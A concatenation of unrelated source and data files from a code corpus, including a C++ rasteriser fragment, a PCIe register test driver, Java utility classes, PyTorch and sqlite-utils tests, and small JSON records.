vertices.push_back(clipspace_vertices[tri_indices[0]]);
vertices.push_back(clipspace_vertices[tri_indices[1]]);
vertices.push_back(clipspace_vertices[tri_indices[2]]);
// split the triangle if it intersects the near plane:
if (enable_near_clipping)
{
vertices = detail::clip_polygon_to_plane_in_4d(vertices, cv::Vec4f(0.0f, 0.0f, -1.0f, -1.0f)); // "Normal" (or "4D hyperplane") of the near-plane. I tested it and it works like this but I'm a little bit unsure because Songho says the normal of the near-plane is (0,0,-1,1) (maybe I have to switch around the < 0 checks in the function?)
}
// triangulation of the polygon formed of vertices array
if (vertices.size() >= 3)
{
for (unsigned char k = 0; k < vertices.size() - 2; k++)
{
boost::optional<detail::TriangleToRasterize> t = detail::process_prospective_tri(vertices[0], vertices[1 + k], vertices[2 + k], viewport_width, viewport_height, enable_backface_culling);
if (t) {
triangles_to_raster.push_back(*t);
}
}
}
}
// Fragment/pixel shader: Colour the pixel values
// for every tri:
for (const auto& tri : triangles_to_raster) {
detail::raster_triangle(tri, colourbuffer, depthbuffer, texture, enable_far_clipping);
}
return std::make_pair(colourbuffer, depthbuffer);
};
} /* namespace render */
} /* namespace eos */
#endif /* RENDER_HPP_ */
| 4,152 |
435 | <gh_stars>100-1000
{
"description": "In the real-world there are 10000s of B2B companies. Their app-stack fits the multi-tenant model - each tenant(customer) deals with it\u2019s own data. It is super critical to build scalable applications which gives the company leeway to grow as more customers get on-boarded. Let\u2019s learn how to do that!\n\nPresentation page -- https://2018.pycon.ca/talks/talk-A-9014",
"recorded": "2018-11-11",
"speakers": [
"<NAME>"
],
"thumbnail_url": "https://i.ytimg.com/vi/RKSwjaZKXL0/hqdefault.jpg",
"title": "Scaling multi-tenant apps using the Django ORM and Postgres",
"videos": [
{
"type": "youtube",
"url": "https://www.youtube.com/watch?v=RKSwjaZKXL0"
}
]
}
| 273 |
4,879 | #include "generator/processor_world.hpp"
#include "generator/cities_boundaries_builder.hpp"
#include "generator/feature_builder.hpp"
#include "generator/generate_info.hpp"
#include "defines.hpp"
namespace generator
{
ProcessorWorld::ProcessorWorld(std::shared_ptr<FeatureProcessorQueue> const & queue,
std::string const & popularityFilename)
: m_popularityFilename(popularityFilename), m_queue(queue)
{
m_processingChain = std::make_shared<RepresentationLayer>();
m_processingChain->Add(std::make_shared<PrepareFeatureLayer>());
m_processingChain->Add(std::make_shared<WorldLayer>(popularityFilename));
auto affiliation = std::make_shared<feature::SingleAffiliation>(WORLD_FILE_NAME);
m_affiliationsLayer =
std::make_shared<AffiliationsFeatureLayer<>>(kAffiliationsBufferSize, affiliation, m_queue);
m_processingChain->Add(m_affiliationsLayer);
}
std::shared_ptr<FeatureProcessorInterface> ProcessorWorld::Clone() const
{
return std::make_shared<ProcessorWorld>(m_queue, m_popularityFilename);
}
void ProcessorWorld::Process(feature::FeatureBuilder & feature)
{
m_processingChain->Handle(feature);
}
void ProcessorWorld::Finish() { m_affiliationsLayer->AddBufferToQueue(); }
} // namespace generator
| 414 |
491 | <gh_stars>100-1000
package top.naccl.service;
import top.naccl.entity.CityVisitor;
public interface CityVisitorService {
void saveCityVisitor(CityVisitor cityVisitor);
}
| 60 |
306 | /*
* Copyright (c) 2015 IBM Corporation and others.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* You may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.brunel.data.modify;
import org.brunel.data.Data;
import org.brunel.data.Dataset;
import org.brunel.data.Field;
import org.brunel.data.Fields;
/**
* The command may be "", which means no operation.
* Otherwise, it is of the format "field:count". The field must be numeric, otherwise it is an error
* It is used as the "size" by which the rows are divided out. It is very commonly just #count
* The end result will be a Dataset with exactly the requested number of rows (which should be greater than 0)
*/
public class SetRowCount extends DataOperation {
/*
Each of the operations has as a key the new field to be created
The operation is one of the following
FIELD_NAME -- a field to be used as a dimension (a factor or group)
FIELD_NAME : base -- a field to be used as a dimension AND a base for percentages
FIELD_NAME : transform -- a measure to use to transform the field (e.g. 'mean', 'count', ...)
Note that an empty field is legal for the count transform
*/
public static Dataset transform(Dataset base, String command) {
if (base.rowCount() == 0 || command.isEmpty()) return base;
String[] parts = DataOperation.strings(command, ',');
return new SetRowCount(base, base.field(parts[0]), Data.parseInt(parts[1])).make();
}
private final Dataset base;
private final Field sizeField;
private final int N;
private SetRowCount(Dataset base, Field sizeField, int N) {
this.base = base;
this.sizeField = sizeField;
if (!sizeField.isNumeric())
throw new IllegalArgumentException("Cannot set rows based on a non-numeric field");
this.N = N;
}
private Dataset make() {
if (base.rowCount() < N) return addRows();
return base;
}
private Dataset addRows() {
		int n = base.rowCount();        // The current number of rows
// This is how many replications we'd really like, as fractional and exact
double[] fractional = new double[n];
int[] replications = new int[fractional.length];
int calculatedN = 0;
double total = sizeField.numProperty("mean") * sizeField.numProperty("n");
for (int i = 0; i < n; i++) {
Double value = Data.asNumeric(sizeField.value(i));
fractional[i] = value == null ? 0 : value * N / total;
replications[i] = (int) Math.round(fractional[i]);
calculatedN += replications[i];
}
// If rounding caused too many rows, repeatedly reduce the result row that has the least excess
while (calculatedN > N) {
int least = 0;
for (int i = 1; i < n; i++)
if (fractional[i] - replications[i] < fractional[least] - replications[least])
least = i;
replications[least]--;
calculatedN--;
}
// If rounding caused too few rows, repeatedly increase the result row that has the least deficit
while (calculatedN < N) {
int most = 0;
for (int i = 1; i < n; i++)
if (fractional[i] - replications[i] > fractional[most] - replications[most])
most = i;
replications[most]++;
calculatedN++;
}
// Build the re-indexing
int[] rowMap = new int[N];
int targetRow = 0, baseRow = 0;
while (targetRow<N) {
for (int i=0; i<replications[baseRow]; i++) rowMap[targetRow++] = baseRow;
baseRow++;
}
// Create the replicated fields
Field[] newFields = new Field[base.fields.length];
for (int i=0; i<newFields.length; i++)
newFields[i] = Fields.permute(base.fields[i], rowMap, false);
// Return the new result
return base.replaceFields(newFields);
}
}
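/*
 * Worked example (illustrative): with size-field values {1, 1, 2} (total 4) and a
 * target of N = 8 rows, the ideal replications are {2, 2, 4}: rows 0 and 1 each
 * appear twice and row 2 four times. When the ideal counts are fractional, the two
 * loops above decrement the most over-allocated rows or increment the most
 * under-allocated ones until exactly N rows remain (a largest-remainder scheme).
 */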
| 1,793 |
348 | {"nom":"<NAME>","circ":"1ère circonscription","dpt":"Yonne","inscrits":436,"abs":223,"votants":213,"blancs":16,"nuls":5,"exp":192,"res":[{"nuance":"LR","nom":"<NAME>","voix":108},{"nuance":"REM","nom":"<NAME>","voix":84}]} | 87 |
365 | # Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import torch
from towhee.models.layers.multi_scale_attention import MultiScaleAttention
class MultiScaleAttentionTest(unittest.TestCase):
def test_multi_scale_attention(self):
seq_len = 21
c_dim = 10
msa = MultiScaleAttention(c_dim, num_heads=2)
fake_input = torch.rand(8, seq_len, c_dim)
input_shape = (2, 2, 5)
output, output_shape = msa(fake_input, input_shape)
self.assertTrue(output.shape == fake_input.shape)
# Test pooling kernel.
msa = MultiScaleAttention(
c_dim,
num_heads=2,
stride_q=(2, 2, 1),
)
output, output_shape = msa(fake_input, input_shape)
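        # With stride_q=(2, 2, 1), the (2, 2, 5) token grid pools to (1, 1, 5);
        # 5 spatial tokens + 1 cls token = 6 tokens per sequence.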
gt_shape_tensor = torch.rand(8, 6, c_dim)
gt_output_shape = [1, 1, 5]
self.assertTrue(output.shape == gt_shape_tensor.shape)
self.assertTrue(output_shape == gt_output_shape)
# Test pooling kernel with no cls.
seq_len = 20
c_dim = 10
fake_input = torch.rand(8, seq_len, c_dim)
msa = MultiScaleAttention(
c_dim, num_heads=2, stride_q=(2, 2, 1), has_cls_embed=False
)
output, output_shape = msa(fake_input, input_shape)
gt_shape_tensor = torch.rand(8, int(seq_len / 2 / 2), c_dim)
gt_output_shape = [1, 1, 5]
self.assertTrue(output.shape == gt_shape_tensor.shape)
self.assertTrue(output_shape == gt_output_shape)
| 852 |
348 | <filename>docs/data/leg-t2/040/04003204.json
{"nom":"Nerbis","circ":"3ème circonscription","dpt":"Landes","inscrits":211,"abs":66,"votants":145,"blancs":13,"nuls":6,"exp":126,"res":[{"nuance":"SOC","nom":"M. <NAME>","voix":93},{"nuance":"REM","nom":"<NAME>","voix":33}]} | 111 |
3,734 | <filename>java8/src/main/java/com/shekhargulati/ninetynine_problems/_02_arithmetic/P37.java
package com.shekhargulati.ninetynine_problems._02_arithmetic;
/**
* (**) Determine the greatest common divisor of two positive integer numbers.
*/
public class P37 {
public static int gcd(int first, int second) {
if (first == 0) {
return second;
} else if (second == 0) {
return first;
} else if (first > second) {
return gcd(first - second, second);
} else {
return gcd(first, second - first);
}
}
}
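/*
 * Illustrative trace: gcd(36, 63) -> gcd(36, 27) -> gcd(9, 27) -> gcd(9, 18)
 * -> gcd(9, 9) -> gcd(9, 0) -> 9. Repeated subtraction is equivalent to the
 * modulo-based Euclidean algorithm, just with more recursive steps.
 */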
| 258 |
1,449 | <gh_stars>1000+
#include "downloader/downloader.h"
#include <QCoreApplication>
#include <QEventLoop>
#include <QObject>
#include <QSettings>
#include <qmath.h>
#include <iostream>
#include <utility>
#include "downloader/download-query-group.h"
#include "downloader/image-downloader.h"
#include "downloader/printers/printer.h"
#include "functions.h"
#include "loader/pack-loader.h"
#include "logger.h"
#include "models/api/api.h"
#include "models/page.h"
#include "models/profile.h"
#include "models/site.h"
#include "tags/tag.h"
#include "tags/tag-api.h"
void loadMoreDetails(const QList<QSharedPointer<Image>> &images)
{
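	// Load tag details for every image while keeping at most `requestsLimit`
	// requests in flight; processEvents() keeps the Qt event loop responsive
	// while we wait for a free slot.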
int work = images.length();
QEventLoop loop;
	int requestsLimit = 5; // simultaneous requests
int runningRequests = 0;
for (auto& image : images) {
while (runningRequests >= requestsLimit) {
QCoreApplication::processEvents(QEventLoop::AllEvents, 100);
}
runningRequests++;
image->loadDetails();
QObject::connect(image.data(), &Image::finishedLoadingTags, [&](){
work--;
runningRequests--;
if (!work) {
loop.quit();
}
});
}
loop.exec();
}
Downloader::Downloader(Profile *profile, Printer *printer, QStringList tags, QStringList postFiltering, QList<Site*> sources, int page, int max, int perPage, QString location, QString filename, QString user, QString password, bool blacklist, Blacklist blacklistedTags, bool noDuplicates, int tagsMin, bool loadMoreDetails, bool login)
: m_profile(profile), m_printer(printer), m_lastPage(nullptr), m_tags(std::move(tags)), m_postFiltering(std::move(postFiltering)), m_sites(std::move(sources)), m_page(page), m_max(max), m_perPage(perPage), m_waiting(0), m_ignored(0), m_duplicates(0), m_tagsMin(tagsMin), m_loadMoreDetails(loadMoreDetails), m_location(std::move(location)), m_filename(std::move(filename)), m_user(std::move(user)), m_password(std::move(password)), m_blacklist(blacklist), m_noDuplicates(noDuplicates), m_blacklistedTags(std::move(blacklistedTags)), m_quit(false), m_login(login)
{}
void Downloader::setQuit(bool quit)
{
m_quit = quit;
}
QList<Page*> Downloader::getAllPagesTags()
{
QList<Page*> pages;
for (auto *site : m_sites) {
auto *page = new Page(m_profile, site, m_sites, m_tags, m_page, m_perPage, m_postFiltering, true, this);
QEventLoop loop;
QObject::connect(page, &Page::finishedLoadingTags, &loop, &QEventLoop::quit, Qt::QueuedConnection);
page->loadTags();
loop.exec();
pages.append(page);
}
return pages;
}
void Downloader::getPageCount()
{
if (m_sites.empty()) {
std::cerr << "No valid source found" << std::endl;
return;
}
const auto pages = getAllPagesTags();
int total = 0;
for (Page *p : pages) {
total += p->imagesCount();
}
qDeleteAll(pages);
if (m_quit) {
m_printer->print(total);
emit quit();
} else {
emit finishedPageCount(total);
}
}
void Downloader::getPageTags()
{
if (m_sites.empty()) {
std::cerr << "No valid source found" << std::endl;
return;
}
const auto pages = getAllPagesTags();
QList<Tag> list;
for (auto p : pages) {
const QList<Tag> &pageTags = p->tags();
for (const Tag &tag : pageTags) {
bool found = false;
for (auto &t : list) {
if (t.text() == tag.text()) {
t.setCount(t.count() + tag.count());
found = true;
}
}
if (!found) {
list.append(tag);
}
}
}
qDeleteAll(pages);
QMutableListIterator<Tag> i(list);
while (i.hasNext()) {
if (i.next().count() < m_tagsMin) {
i.remove();
}
}
if (m_quit) {
m_printer->print(list);
emit quit();
} else {
emit finishedTags(list);
}
}
void Downloader::getTags()
{
if (m_sites.empty()) {
std::cerr << "No valid source found" << std::endl;
return;
}
QList<Tag> results;
for (Site *site : qAsConst(m_sites)) {
Api *api = site->tagsApi();
if (api == nullptr) {
log(QStringLiteral("No valid API for loading tags for source: %1").arg(site->url()), Logger::Error);
return;
}
int pages = qCeil(static_cast<qreal>(m_max) / m_perPage);
if (pages <= 0 || m_perPage <= 0 || m_max <= 0) {
pages = 1;
}
for (int p = 0; p < pages; ++p) {
auto *tagApi = new TagApi(m_profile, site, api, m_page + p, m_perPage, "count", this);
QEventLoop loop;
QObject::connect(tagApi, &TagApi::finishedLoading, &loop, &QEventLoop::quit, Qt::QueuedConnection);
tagApi->load();
loop.exec();
const QList<Tag> tags = tagApi->tags();
log(QStringLiteral("Received pure tags (%1)").arg(tags.count()));
tagApi->deleteLater();
results.append(tags);
}
}
QMutableListIterator<Tag> i(results);
while (i.hasNext()) {
if (i.next().count() < m_tagsMin) {
i.remove();
}
}
if (m_quit) {
m_printer->print(results);
emit quit();
} else {
emit finishedTags(results);
}
}
QList<QSharedPointer<Image>> Downloader::getAllImages()
{
const bool usePacking = m_profile->getSettings()->value("packing_enable", true).toBool();
const int imagesPerPack = m_profile->getSettings()->value("packing_size", 1000).toInt();
const int packSize = usePacking ? imagesPerPack : -1;
QSet<QString> md5s;
QList<QSharedPointer<Image>> images;
for (auto *site : m_sites) {
DownloadQueryGroup query(m_tags, m_page, m_perPage, m_max, m_postFiltering, m_blacklist, site, m_filename, m_location);
PackLoader loader(m_profile, query, packSize, nullptr);
loader.start(m_login);
while (loader.hasNext()) {
const auto next = loader.next();
for (const auto &img : next) {
if (m_noDuplicates) {
if (md5s.contains(img->md5())) {
continue;
}
md5s.insert(img->md5());
}
images.append(img);
}
}
}
return images;
}
void Downloader::getImages()
{
if (m_sites.empty()) {
std::cerr << "No valid source found" << std::endl;
return;
}
const auto images = getAllImages();
for (const auto &image : images) {
ImageDownloader dwl(m_profile, image, m_filename, m_location, 0, true, false, this);
if (!m_blacklist) {
dwl.setBlacklist(&m_blacklistedTags);
}
QEventLoop loop;
QObject::connect(&dwl, &ImageDownloader::saved, &loop, &QEventLoop::quit, Qt::QueuedConnection);
dwl.save();
loop.exec();
if (!m_quit) {
emit finishedImage(image);
}
}
if (m_quit) {
m_printer->print(QStringLiteral("Downloaded images successfully."));
emit quit();
}
}
void Downloader::getUrls()
{
if (m_sites.empty()) {
std::cerr << "No valid source found" << std::endl;
return;
}
const auto images = getAllImages();
if (m_loadMoreDetails) {
loadMoreDetails(images);
}
if (m_quit) {
m_printer->print(images);
emit quit();
} else {
emit finishedImages(images);
}
}
| 2,643 |
333 | from collections import Counter
from foo.project_settings import *
from operator import itemgetter
import sys
import json
if __name__ == '__main__':
pslug = sys.argv[1]
if not does_project_exist(pslug):
raise NameError(project_dir(pslug) + " does not exist")
with open(words_transcript_path(pslug)) as f:
words = [w for w in json.load(f)]
unique_words = Counter(w['text'].lower() for w in words)
total_duration = words[-1]['end']
word_count = len(words)
print()
print("Total duration:", total_duration)
print("Total word count:", word_count)
print("Words/second:", round(word_count/ total_duration, 2))
print("Total unique words used:", len(unique_words))
print("Median word confidence:", sorted(words, key=itemgetter('confidence'))[word_count//2]['confidence'])
longest_words_by_char = sorted(words, key=lambda w: len(w['text']), reverse=True)
print()
print("Top 10 longest words by spelling:")
print("---------------------------------")
for w in longest_words_by_char[0:10]:
print(w['text'])
# longest_words_by_duration = sorted(words, key=lambda w: w['end'] - w['start'], reverse=True)
# print()
# print("Top 10 longest words by spoken duration:")
# print("----------------------------------------")
# for w in longest_words_by_duration[0:10]:
# print(w['text'])
print()
print("All words, listed in order of frequency:")
print("----------------------------------------")
for i, (w, x) in enumerate(sorted(unique_words.most_common(), key=lambda z: (-z[1], z[0]))):
print((str(i) + '. ').ljust(4) + w.ljust(30), str(x).rjust(6))
| 614 |
480 | <filename>options/internal/include/mlibc/debug.hpp
#ifndef MLIBC_DEBUG_HPP
#define MLIBC_DEBUG_HPP
#include <frg/logging.hpp>
namespace mlibc {
struct InfoSink {
// constexpr so that this can be initialized statically.
constexpr InfoSink() = default;
void operator() (const char *message);
};
struct PanicSink {
// constexpr so that this can be initialized statically.
constexpr PanicSink() = default;
void operator() (const char *message);
};
extern frg::stack_buffer_logger<InfoSink> infoLogger;
extern frg::stack_buffer_logger<PanicSink> panicLogger;
} // namespace mlibc
#endif // MLIBC_DEBUG_HPP
| 217 |
335 | {
"word": "Untidy",
"definitions": [
"Not arranged neatly and in order.",
"Not inclined to keep one's possessions or appearance neat and in order."
],
"parts-of-speech": "Adjective"
} | 83 |
32,544 | package com.baeldung.hamcrest;
import com.baeldung.hamcrest.objectmatchers.City;
import com.baeldung.hamcrest.objectmatchers.Location;
import org.junit.Test;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.Matchers.*;
public class HamcrestObjectUnitTest {
@Test
public void givenACity_whenHasToString_thenCorrect() {
City city = new City("San Francisco", "CA");
assertThat(city, hasToString("[Name: San Francisco, State: CA]"));
}
@Test
public void givenACity_whenHasToStringEqualToIgnoringCase_thenCorrect() {
City city = new City("San Francisco", "CA");
assertThat(city, hasToString(equalToIgnoringCase("[NAME: <NAME>, STATE: CA]")));
}
@Test
public void givenACity_whenHasToStringEmptyOrNullString_thenCorrect() {
City city = new City(null, null);
assertThat(city, hasToString(emptyOrNullString()));
}
@Test
public void givenACity_whenTypeCompatibleWithLocation_thenCorrect() {
City city = new City("San Francisco", "CA");
assertThat(city.getClass(), is(typeCompatibleWith(Location.class)));
}
@Test
public void givenACity_whenTypeNotCompatibleWithString_thenCorrect() {
City city = new City("San Francisco", "CA");
assertThat(city.getClass(), is(not(typeCompatibleWith(String.class))));
}
@Test
public void givenACity_whenTypeCompatibleWithObject_thenCorrect() {
City city = new City("San Francisco", "CA");
assertThat(city.getClass(), is(typeCompatibleWith(Object.class)));
}
}
| 594 |
364 | <gh_stars>100-1000
package io.github.jklingsporn.vertx.jooq.shared;
import io.vertx.core.json.JsonArray;
import org.jooq.Converter;
/**
* Created by jensklingsporn on 04.10.16.
* Use this converter to convert any varchar/String column into a JsonArray.
*/
public class JsonArrayConverter implements Converter<String,JsonArray> {
@Override
public JsonArray from(String databaseObject) {
return databaseObject==null?null:new JsonArray(databaseObject);
}
@Override
public String to(JsonArray userObject) {
return userObject==null?null:userObject.encode();
}
@Override
public Class<String> fromType() {
return String.class;
}
@Override
public Class<JsonArray> toType() {
return JsonArray.class;
}
}
| 298 |
1,025 | <reponame>pkh/Core-Data-Editor
#import <Foundation/Foundation.h>
@interface CDEManagedObjectIDToStringValueTransformer : NSValueTransformer
#pragma mark - Register
+ (void)registerDefaultManagedObjectIDToStringValueTransformer;
@end
| 76 |
2,338 | <gh_stars>1000+
// RUN: %clang -E -mspeculative-load-hardening %s -o - | FileCheck --check-prefix=CHECK-SLH %s
// RUN: %clang -E -mno-speculative-load-hardening %s -o - | FileCheck --check-prefix=CHECK-NOSLH %s
// RUN: %clang -E %s -o - | FileCheck --check-prefix=CHECK-DEFAULT %s
#if __has_feature(speculative_load_hardening)
int SpeculativeLoadHardeningEnabled();
#else
int SpeculativeLoadHardeningDisabled();
#endif
// CHECK-SLH: SpeculativeLoadHardeningEnabled
// CHECK-NOSLH: SpeculativeLoadHardeningDisabled
// CHECK-DEFAULT: SpeculativeLoadHardeningDisabled
| 213 |
5,169 | <reponame>ftapp/cocoapods
{
"name": "SobrCameraView",
"version": "0.2.1",
"summary": "A simple UIView-Subclass which enables border detection of documents.",
"homepage": "https://github.com/softwarebrauerei/SobrCameraView-ios",
"license": "MIT",
"authors": {
"<NAME> AG": "<EMAIL>"
},
"source": {
"git": "https://github.com/softwarebrauerei/SobrCameraView-ios.git",
"tag": "0.2.1"
},
"platforms": {
"ios": "8.0"
},
"source_files": "SobrCameraView/*.swift",
"requires_arc": true
}
| 220 |
315 | package io.budgetapp.model;
import java.io.Serializable;
/**
*
*/
public class Point implements Serializable {
private static final long serialVersionUID = -4254482540288351126L;
private String label;
private long key;
private double value;
private PointType pointType;
public Point(String label, long key, double value, PointType pointType) {
this.label = label;
this.key = key;
this.value = value;
this.pointType = pointType;
}
public String getLabel() {
return label;
}
public long getKey() {
return key;
}
public double getValue() {
return value;
}
public PointType getPointType() {
return pointType;
}
}
| 285 |
326 | /*
//--------------------------------------------------------------------------------
//--
//-- This file is owned and controlled by Xilinx and must be used solely
//-- for design, simulation, implementation and creation of design files
//-- limited to Xilinx devices or technologies. Use with non-Xilinx
//-- devices or technologies is expressly prohibited and immediately
//-- terminates your license.
//--
//-- Xilinx products are not intended for use in life support
//-- appliances, devices, or systems. Use in such applications is
//-- expressly prohibited.
//--
//-- **************************************
//-- ** Copyright (C) 2006, Xilinx, Inc. **
//-- ** All Rights Reserved. **
//-- **************************************
//--
//--------------------------------------------------------------------------------
//-- Filename: test_reg.cpp
//--
//-- Description:
//--
//-- Sample driver for the Memcached demo
//-- Writes and reads to/from all relevant device registers
//--
//--
//--------------------------------------------------------------------------------
*/
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <termios.h>
#include <fcntl.h>
#include <errno.h>
#include "xpcie.h"
#define NUM_T 32
char devname[] = "/dev/xpcie";
int g_devFile = -1;
struct TransferData {
unsigned int data[NUM_T];
} *gReadData, *gWriteData;
int ReadReg(int offset){
	xpcie_arg_t* q=(xpcie_arg_t*) malloc(sizeof(xpcie_arg_t));
	(*q).offset=offset;
	(*q).rdata=0x55;//will be overwritten, is just a sanity check
	(*q).wdata=0x66;//not used for read, is just a sanity check
	int ret=ioctl(g_devFile,XPCIE_READ_REG,q);//XPCIE_READ_REG is a constant defined in xpcie.h
	if(ret){
		printf("error while reading pcie. offset:%x error:%x\n",offset,ret);
	}
	//printf("got back offs=%x rdata=%x wdata=%x rcode %d\n",(*q).offset,(*q).rdata,(*q).wdata,ret);
	int rdata=(*q).rdata;
	free(q);//release the per-call argument struct instead of leaking it
	return rdata;
}
void WriteReg(int offset, int wdata){
	xpcie_arg_t* q=(xpcie_arg_t*) malloc(sizeof(xpcie_arg_t));
	(*q).offset=offset;
	(*q).rdata=0x55;//not used for write, is just a sanity check
	(*q).wdata=wdata;
	int ret=ioctl(g_devFile,XPCIE_WRITE_REG,q);
	if(ret){
		printf("error while writing pcie. offset:%x error:%x\n",offset,ret);
	}
	//printf("got back offs=%x rdata=%x wdata=%x rcode %d\n",(*q).offset,(*q).rdata,(*q).wdata,ret);
	free(q);//release the per-call argument struct instead of leaking it
}
//bulk read from beginning of device memory. Not really needed
int WriteData(char* buff, int size)
{
int ret = write(g_devFile, buff, size);
return (ret);
}
//bulk write to beginning of device memory Not really needed
int ReadData(char *buff, int size)
{
int ret = read(g_devFile, buff, size);
return (ret);
}
int main()
{
int i, j;
char* devfilename = devname;
g_devFile = open(devfilename, O_RDWR);
if ( g_devFile < 0 ) {
printf("Error opening device file\n");
return 0;
}
/*gReadData = (TransferData *) malloc(sizeof(struct TransferData));
gWriteData = (TransferData *) malloc(sizeof(struct TransferData)); */
//read address must be 4-aligned to yield proper result
//ReadReg(0x8);
// ReadReg(0xffc);//4k if you go over 0xffc, bad things happen
//addresses of FREE regs: 0x30, 0x34, 0x38, 0x3C
//when the FREE regs are written to, the circuit gets notified of the fresh value
//when the FREE regs are read from, the most significant bit tells if the fifo is full
//the other 31 bits hold the value that was written in the last write to the reg
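	//e.g. after writing 0xCAFECAFE, a read-back presumably yields 0x4AFECAFE while not full (top bit clear) or 0xCAFECAFE once full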
printf("\n\n##############################\n\n");
int x=ReadReg(0xf0);
printf("IBM Memcached Power8 Demo: Bitstream revision number: %x\n",x);
for(int rwnum=0;rwnum<4;rwnum++){
printf("\n\n##############################\n\n");
int rwAdd=4*rwnum+0x30;
printf("reading free%d from %x\n",rwnum+1,rwAdd);
int x=ReadReg(rwAdd);
printf("read result: %x\n",x);
printf("writing 0xCAFECAFE to free%d at %x\n",rwnum+1,rwAdd);
WriteReg(rwAdd,0xCAFECAFE);
printf("reading free%d from %x ",rwnum+1,rwAdd);
x=ReadReg(rwAdd);
printf("read result: %x\n",x);
bool wasFull=x&0x80000000;
printf("full flag in top bit was: %s",(wasFull?"true":"false"));
}
printf("\n\n##############################\n\n");
//the DEL reg does nothing for now
int rwAdd=0x20;
	printf("reading del from %x\n",rwAdd);
	x=ReadReg(rwAdd);
	printf("read result: %x\n",x);
bool wasFull=x&0x80000000;
printf("ety flag in top bit was: %s",(wasFull?"true":"false"));
printf("\n\n##############################\n\n");
//check the 4 stats registers, will be occasionally nonzero when ethernet exercised
//the stats values in the hardware are generated like this:
//if data line busy, increase counter1
//always increase counter2
//if counter2 overflows, reset both, write value of counter1 to software readable register
//counter2 has 22 bits => max value 2^22-1, so busy percentage is s0/((1<<22)-1)*100;
int maxval=(1<<22)-1;
for(;;){
int s0=ReadReg(0x0);//stats0
int s1=ReadReg(0x4);//stats1
int s2=ReadReg(0x8);//stats2
int s3=ReadReg(0xc);//stats3
double p0,p1,p2,p3;
p0=(double)s0/maxval*100;
p1=(double)s1/maxval*100;
p2=(double)s2/maxval*100;
p3=(double)s3/maxval*100;
//if(s0!=0||x1!=0){
// printf("stats0= %x stats1= %x stats2= %x stats3= %x ",s0,s1,s2,s3);
//}
//printf("stats0= %x stats1= %x stats2= %x stats3= %x \r",s0,s1,s2,s3);
printf("stats0= %3.2f%% stats1= %3.2f%% stats2= %3.2f%% stats3= %3.2f%% \r",p0,p1,p2,p3);
}
}
| 2,426 |
351 | {
"request": {
"api_url": "https://api.baremetrics.com/v1/account",
"headers": {
"Authorization": "Bearer TEST"
}
},
"response": {
"error": "Unauthorized. Token not found (001)"
},
"response-headers": {
"Cache-Control":"no-cache",
"X-Version":"751",
"X-Runtime":"0.003459",
"Access-Control-Allow-Methods":"GET, OPTIONS, POST, PUT, DELETE",
"Transfer-Encoding":"chunked",
"Date":"Tue, 06 Feb 2018 14:00:34 GMT",
"Connection":"keep-alive",
"CF-RAY":"3e8ea2ed2dbe3de4-PRG",
"Access-Control-Allow-Credentials":"false",
"Content-Type":"application/json; charset=utf-8",
"Set-Cookie":"__cfduid=d17cabc42559cc2d84e59a61d199208c11517925634; expires=Wed, 06-Feb-19 14:00:34 GMT; path=/; domain=.baremetrics.com; HttpOnly; Secure, LSW_WEB=\"LSW_WEB1\"; path=/",
"Access-Control-Allow-Headers":"Authorization,DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type",
"X-Request-Id":"4c6d2ef3-2b72-4b7a-b535-991ee8c06fba",
"X-Commit":"<PASSWORD>",
"X-Powered-By":"Phusion Passenger 5.1.11",
"Expect-CT":"max-age=604800, report-uri=\"https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct\"",
"Server":"cloudflare",
"Status":"401 Unauthorized"
}
}
| 674 |
729 | import json
import pytest
from click.testing import CliRunner
from sqlite_utils import Database, cli
def test_memory_basic():
result = CliRunner().invoke(cli.cli, ["memory", "select 1 + 1"])
assert result.exit_code == 0
assert result.output.strip() == '[{"1 + 1": 2}]'
@pytest.mark.parametrize("sql_from", ("test", "t", "t1"))
@pytest.mark.parametrize("use_stdin", (True, False))
def test_memory_csv(tmpdir, sql_from, use_stdin):
content = "id,name\n1,Cleo\n2,Bants"
input = None
if use_stdin:
input = content
csv_path = "-"
if sql_from == "test":
sql_from = "stdin"
else:
csv_path = str(tmpdir / "test.csv")
open(csv_path, "w").write(content)
result = CliRunner().invoke(
cli.cli,
["memory", csv_path, "select * from {}".format(sql_from), "--nl"],
input=input,
)
assert result.exit_code == 0
assert (
result.output.strip() == '{"id": 1, "name": "Cleo"}\n{"id": 2, "name": "Bants"}'
)
@pytest.mark.parametrize("use_stdin", (True, False))
def test_memory_tsv(tmpdir, use_stdin):
data = "id\tname\n1\tCleo\n2\tBants"
if use_stdin:
input = data
path = "stdin:tsv"
sql_from = "stdin"
else:
input = None
path = str(tmpdir / "chickens.tsv")
open(path, "w").write(data)
path = path + ":tsv"
sql_from = "chickens"
result = CliRunner().invoke(
cli.cli,
["memory", path, "select * from {}".format(sql_from)],
input=input,
)
assert result.exit_code == 0, result.output
assert json.loads(result.output.strip()) == [
{"id": 1, "name": "Cleo"},
{"id": 2, "name": "Bants"},
]
@pytest.mark.parametrize("use_stdin", (True, False))
def test_memory_json(tmpdir, use_stdin):
data = '[{"name": "Bants"}, {"name": "Dori", "age": 1, "nested": {"nest": 1}}]'
if use_stdin:
input = data
path = "stdin:json"
sql_from = "stdin"
else:
input = None
path = str(tmpdir / "chickens.json")
open(path, "w").write(data)
path = path + ":json"
sql_from = "chickens"
result = CliRunner().invoke(
cli.cli,
["memory", path, "select * from {}".format(sql_from)],
input=input,
)
assert result.exit_code == 0, result.output
